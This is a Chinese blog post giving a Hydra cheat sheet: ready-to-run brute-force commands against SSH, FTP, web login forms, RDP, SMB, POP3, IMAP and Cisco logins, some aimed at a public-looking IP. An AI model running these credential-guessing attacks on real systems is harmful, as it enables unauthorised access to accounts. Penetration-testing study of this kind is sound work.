Hydra 的使用


字典集
https://www.weakpass.com/
1.破解ssh
(1)破解指定用户名密码

hydra ip ssh -l 用户名 -P 密码字典 -t 线程(默认16) -vV
hydra ip ssh -l 用户名 -P 密码字典 -e ns -vV

(2)批量破解ssh账号和密码

hydra -L weakpwd.txt -P weakpwd.txt 196.219.53.1 ssh -V
hydra -L list_user -P list_password 192.168.56.101 ssh -V

2.破解ftp

(1)破解指定用户名密码

hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV

(2)批量破解FTP账号和密码

hydra -L weakpwd.txt -P weakpwd.txt 196.219.53.1 ftp -V
hydra -L list_user -P list_password 192.168.56.101 ftp -V

3.GET方式提交,破解Web登录

hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php

4.POST方式提交,破解Web登录4.POST方式提交,破解Web登录

(1)hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form “/admin/login.php: username= ^USER^ &password=^PASS^&submit=login:sorry password”

hydra -L list_user -P list_password 192.168.0.115 http-post-form “member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes&inajax=1:fastloginfield=username&username=^USER^&password=^PASS^&quickforward=yes&handlekey=ls:Login failed” –V

(2)对admin密码进行破解

hydra -t 3 -l admin -P pass.txt -o out.txt -f 192.168.0.115 http-post-form “login.php:id=^USER^&passwd=^PASS^:wrong username or password

“-t”表示同时线程数为3;“-l”表示用户名是“admin”,字典为pass.txt,保存为out.txt;“-f”表示破解1个密码就停止;“192.168.0.115”表示目标IP地址;“http-post-form”表示采用HTTP的POST方式提交表单密码破解;

5.破解HTTPS

hydra -m /index.php -l muts -P pass.txt 192.168.0.115 https

6.破解teamspeak

hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak

7.破解Cisco

hydra -P pass.txt 192.168.0.115 cisco
hydra -m cloud -P pass.txt 192.168.0.115 cisco-enable

8.破解SMB

hydra -l administrator -P pass.txt 192.168.0.115 smb

9.破解POP3

hydra -l muts -P pass.txt my.pop3.mail pop3

10.破解远程终端账号

(1)破解管理员账号

hydra ip rdp -l administrator -P pass.txt -V

(2)批量破解账号

hydra -s 3389 192.168.44.138 rdp -L user.txt -P pwd.txt –V

11.破解HTTP-Proxy

hydra -l admin -P pass.txt http-proxy://192.168.0.115

12.破解IMAP

hydra -L user.txt -p secret 192.168.0.115 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN


文章作者: yaron
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 yaron !
 上一篇
Hexo + Next 搭建GitHub page Hexo + Next 搭建GitHub page
0x00 准备工作 下载node.js并安装 官网下载安装默认会安装npm; 下载安装git 官网下载安装; 安装hexo,方法:管理员打开cmd:$ npm install -g hexo-cli。
2021-06-08
下一篇 
CVE-2017-12615漏洞复现 CVE-2017-12615漏洞复现
漏洞利用条件和方式: CVE-2017-12615漏洞利用需要在Windows环境,且需要将 readonly 初始化参数由默认值设置为 false,经过实际测试,Tomcat 7.x版本内web.xml配置文件内默认配置无readonly
2021-06-08
  目录